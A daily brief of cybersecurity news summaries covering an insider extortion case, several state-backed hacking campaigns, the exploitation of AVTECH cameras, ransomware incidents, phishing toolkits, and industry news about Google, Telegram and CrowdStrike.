Daily Brief

Daniel Rhyne, a 57-year-old former infrastructure engineer from Kansas City, Missouri, is accused of orchestrating an extortion scheme against his employer, an industrial company in New Jersey. After altering user account settings, Rhyne allegedly locked IT admins out of the network by changing passwords for domain and local user accounts, impacting over 3,284 workstations and 254 servers. He demanded a ransom by threatening to shut down 40 servers daily and claimed to have erased all backups in a sinister email to the company’s employees. Rhyne reportedly utilized tools like Windows' net user and Sysinternals Utilities' PsPasswd to execute the password changes, using the alias "TheFr0zenCrew!". Evidence tying Rhyne to these actions includes logs from a hidden virtual machine on his company-issued laptop, suspicious web search history concerning password changes, and security footage of his unusual activities around company facilities. If convicted, Rhyne could face up to 35 years in prison; the charges include extortion, intentional damage to a protected computer, and wire fraud.

Daniel Rhyne, a former IT engineer, has been arrested for locking out users and demanding ransom. Incident occurred in November 2023 at an industrial company based in New Jersey. Rhyne altered credentials for domain and local admin accounts, affecting over 3,284 workstations. He deleted domain admin accounts and threatened to shut down 40 servers daily unless a ransom was paid. Used tools like Windows' net user and Sysinternals Utilities' PsPasswd to change account passwords to "TheFr0zenCrew!" His illegal activities were traced back to a company-issued laptop and a hidden virtual machine. Rhyne’s web search history included queries on changing passwords and remotely accessing admin accounts. He faces up to 35 years in prison for charges of extortion, intentional damage to a protected computer, and wire fraud.

Threat actors are using malware disguised as Palo Alto GlobalProtect, a popular VPN tool, to target Middle Eastern organizations. The malware is suspected to be distributed via phishing emails, enticing users to install a rogue application named 'setup.exe'. Upon execution, the malware masquerades as a standard installation of GlobalProtect and runs stealthily in the background. It performs checks to avoid detection by sandboxing environments before activating and connecting with a command and control (C2) server. The malware profiles the infected machine and employs AES encryption to secure data transmissions to the C2. The C2 domain leverages a name that mimics legitimate regional VPN portals, aiding in evasion. Communication between the malware and C2 occurs through beacons sent using Interactsh, a tool also noted in use by sophisticated APT groups. Despite apparent sophistication and targeted nature of the attack, the identity of the threat actors remains unconfirmed.

Google has updated its Chrome Vulnerability Rewards Program (VRP), significantly increasing payout amounts for bug discoveries. The highest reward for identifying security flaws in Chrome has been elevated to $250,000, particularly for bugs that allow remote code execution in a non-sandboxed process. Google aims to motivate more profound and high-quality research into vulnerabilities, especially regarding memory corruption issues. The revised reward structure now emphasizes four categories: remote code execution, controlled memory write, general memory corruption, and baseline reports with proof-of-concepts. The introduction of MiraclePtr in Chrome has changed the classification of bugs, with special rewards reaching up to $250,128 for bypassing this protection mechanism. Memory safety remains a critical priority due to the prevalence of severe bugs in large C++ codebases like Chrome. Google's VRP enhancements reflect an ongoing effort to secure its browser against increasingly sophisticated threats.

A Vietnamese human rights nonprofit has been subjected to a sustained cyberattack campaign for over four years. Huntress, a cybersecurity firm, has attributed the attacks to APT32, also known as OceanLotus, a group linked with Vietnamese state interests. APT32 is known for its cyber espionage efforts since 2012, targeting entities in Vietnam, Philippines, Laos, and Cambodia. The cyberattacks utilize spear-phishing and "watering hole" tactics to deploy malware such as backdoors and information stealers. In recent attacks tracked by Huntress, various methods were used to implant Cobalt Strike Beacons and other malicious payloads into the systems, facilitating data theft and surveillance. The attacks also involved creating and manipulating scheduled tasks and Windows Registry keys to maintain persistence and control over compromised systems. This activity coincides with related cyber campaigns targeting South Korean users, suggesting a broad and continued pattern of cyber espionage by the group.

Russian state-backed hackers, identified as APT29, exploited vulnerabilities in Apple Safari and Google Chrome to launch cyberattacks. The attacks occurred from November 2023 to July 2024, targeting Mongolian government websites through watering hole tactics. Exploits used were previously associated with commercial surveillance vendors like Intellexa and NSO Group, suggesting exploit reuse. The intrusions aimed to steal browser cookies and sensitive information from mobile device users visiting the compromised sites. Google Threat Analysis Group highlighted that the exploits, although patched, were effective against users on unpatched devices. The attacks specifically targeted government officials and were part of a broader strategy to exfiltrate data from Western European countries. This incident underscores the ongoing threat posed by nation-state actors using sophisticated techniques to exploit n-day vulnerabilities on popular browsers.

A zero-day vulnerability in AVTECH IP cameras, discontinued since 2019, is being exploited by Corona, a Mirai-based malware. The vulnerability, identified as CVE-2024-7029, involves a high-severity remote code execution flaw in the camera's brightness setting feature. The U.S. Cybersecurity and Infrastructure Security Agency has issued an advisory due to the camera's use in sensitive sectors such as healthcare and transportation. Exploits for this vulnerability, allowing command injection via network requests, have been available publicly since at least 2019 but only recently used in active attacks by Corona. Beginning March 18, 2024, attackers started exploiting this vulnerability to infect cameras and integrate them into a botnet for DDoS attacks. AVTECH's inability to provide patches for these EoL devices leaves them permanently vulnerable, prompting recommendations to take the impacted cameras offline and replace them. Akamai's security team has captured live attack data and is monitoring additional exploits by the Corona botnet relevant to several other IoT vulnerabilities.

Russian APT group APT29 used commercial spyware vendor-derived exploits to attack Mongolian government websites between November 2023 and July 2024. Google's Threat Analysis Group identified and reported the use of patched vulnerabilities, effective against unupdated iOS and Android devices. APT29 employed "watering hole" tactics, compromising legitimate sites to deliver malicious payloads to targeted visitors. The exploits used were nearly identical to those originally developed by spyware vendors like NSO Group and Intellexa for zero-day attacks. Attacks leveraged known vulnerabilities such as CVE-2023-41993 for cookie theft on older iOS versions and CVE-2024-5274 and CVE-2024-4671 on Chrome, targeting Android users. It remains unclear how APT29 acquired the said exploits, with possibilities including hacking, insider threats, or indirect collaboration. The ongoing use of known exploits highlights the crucial need for timely and comprehensive updates and patches for security advisories.

Brain Cipher ransomware group claims responsibility for the cyberattack on multiple French national museums, including Le Grand Palais, during the Olympic Games, intending to leak 300 GB of data. The cyberattack occurred over August 3-4 and targeted a system centralizing financial data of about 40 institutions managed by Réunion des Musées Nationaux – Grand Palais (RMN-GP). No details regarding the nature of the stolen data have been disclosed by Brain Cipher, other than the volume. French law enforcement and the affected institutions have not released details on their recovery efforts or the investigation since the public disclosure on August 6. French national cybersecurity (ANSSI) and data protection agencies (CNIL) have been informed but have provided minimal additional information. Brain Cipher, a new cybercriminal group, allegedly uses a ransomware payload derived from the leaked LockBit 3.0 builder, featuring advanced code obfuscation and evasion techniques. The incident reportedly did not compromise operational systems or the 2024 Olympic and Paralympic Games’ information systems.

U.S. agencies including CISA, FBI, and DC3 have issued warnings about an Iranian hacking group, Pioneer Kitten, linked to ransomware attacks across multiple sectors in the U.S. and other countries. This group, also known by several aliases such as Fox Kitten and Lemon Sandstorm, operates under the guise of an Iranian IT company, Danesh Novin Sahand, and is connected to the government of Iran. Pioneer Kitten's attacks target sectors like education, finance, healthcare, and defense, aiming to establish initial footholds in networks to facilitate further ransomware attacks in collaboration with affiliates like NoEscape, RansomHouse, and BlackCat. The group exploits vulnerabilities in internet-facing assets through remote external services, employing tools for persistent access and privilege escalation such as AnyDesk and Ligolo. They are also involved in monetizing network access on underground marketplaces, offering full domain control and admin credentials to enable future ransomware activities. Iranian state-sponsored operations also extend to additional groups like Peach Sandstorm which deploys custom malware and conducts espionage, targeting government, defense, and oil sectors among others. Google’s Mandiant uncovered an HR-themed Iranian counterintelligence operation aiming to collect data on Iranians collaborating with adversaries, using fake recruitment websites.

AitM phishing attacks utilize toolkits to act as proxies between users and legitimate login portals, creating authentic-seeming interactions while stealing credentials and session control. These attacks enable culprits to bypass traditional security measures such as Multi-Factor Authentication (MFA), Endpoint Detection and Response (EDR), and email filtering, posing significant risks to organizations. Toolkits like Evilginx and Muraena employ reverse web proxy techniques, while others like EvilNoVNC use Browser-in-the-Middle (BitM) approaches for more direct control. The development and commercialization of advanced phishing toolkits reflect the high value and ease of exploiting digital identities to access business applications and sensitive data. Phishing attacks increasingly target Software as a Service (SaaS) applications and conclude entirely outside traditional network perimeters. Traditional phishing defenses, which mostly block known bad URLs and IPs, are ineffective against these sophisticated attacks, necessitating a shift to more proactive and dynamic detection methods. The article suggests leveraging browser-based security controls to detect and block phishing attacks at the point of credential entry, akin to the role of Endpoint Detection and Response (EDR) for network attacks.

A severe flaw in AVTECH IP cameras, tagged CVE-2024-7029, allows attackers to execute remote commands, contributing to botnet assembly. This undisputed vulnerability affects discontinued AVM1203 camera devices and is still unrectified. The exploit, evident from the low complexity of attack and remote exploitability, was disclosed by the U.S. Cybersecurity and Infrastructure Security Agency earlier this month. Although the problem was known as early as February 2019 when a public proof of concept was created, it wasn’t assigned a CVE until August 2024. Hackers initiating this attack have used the flaw since March 2024 to propagate a variant of the Mirai botnet named Corona Mirai. The botnet infects systems, connecting to multiple hosts via Telnet, and has impacted sectors including healthcare, transportation, and financial services. Related botnet activities have involved other devices like TP-Link and ASUS routers, indicating an ecosystem of interconnected botnet exploitations supporting varied malicious activities.

French prosecutors charged Telegram CEO Pavel Durov with facilitating various criminal activities including the distribution of child sexual abuse material (CSAM), organized crime, and drug trafficking. Durov was arrested upon entering France and is under investigation for not complying with law enforcement's requests for platform data interception. As part of his conditional release, Durov posted a €5 million bail and must stay in France, reporting to authorities bi-weekly. The charges stem from a judicial investigation initiated due to Telegram's inadequate moderation that allowed extensive extremist actions. A cooperative assessment by various French and European agencies spurred the investigation, criticizing Telegram's lack of cooperation with judicial systems. Despite Telegram's claim of regularly banning abusive groups and asserting their platform policy, French authorities moved ahead with legal action. The situation underscores a rare instance of holding a tech CEO accountable for users' activities on their platform. Durov's prior connections with the Russian platform Vkontakte and previous incidents of hacking also complicate his case.

CrowdStrike's Q2 fiscal year 2025 revenue increased by 32%, reaching $963.9 million, despite a significant software mishap in July. The cybersecurity firm experienced issues with a Falcon sensor update that disrupted 8.5 million Windows machines, impacting global flights, medical services, and emergency services in the US. Despite the incident, CrowdStrike adjusted its full-year revenue projection slightly downwards, from between $3.98 billion and $4.01 billion to between $3.89 billion and $3.90 billion. CEO George Kurtz highlighted the resiliency of the business, noting substantial deal closures during the incident, with most delayed deals still in the pipeline. Analysts believe that existing CrowdStrike customers, particularly those deeply integrated with multiple security products, are unlikely to switch providers due to the high costs and efforts required. Delta Air Lines, despite planning to sue CrowdStrike and Microsoft for the outage-related setbacks, is unlikely to change security providers promptly due to their dependency on CrowdStrike’s services. Industry response to CrowdStrike's handling of the incident has been generally positive, potentially mitigating long-term reputation damage.

South Korean cyberespionage group APT-C-60 used a zero-day vulnerability in WPS Office to install SpyGlace malware on targets in East Asia. The vulnerability, known as CVE-2024-7262, affected versions of WPS Office from August 2023 to March 2024 and was patched silently by Kingsoft. APT-C-60 manipulated WPS Office's protocol handlers to execute malicious code via crafted URLs hidden under decoy images in documents. ESET identified another serious flaw, CVE-2024-7263, resulting from an incomplete fix of CVE-2024-7262, which could also enable arbitrary code execution. The attacker’s methodology involved using MHTML files, allowing remote exploitation by embedding malicious hyperlinks. SpyGlace, the malware delivered through this exploit, had been used in previous campaigns targeting HR and trade-related entities. Users are advised to update their WPS Office software to the latest version, 12.2.0.17119, to secure both vulnerabilities. ESET’s findings underscore the complexity and stealthiness of the attacks, urging users to be cautious of deceptive files appearing legitimate.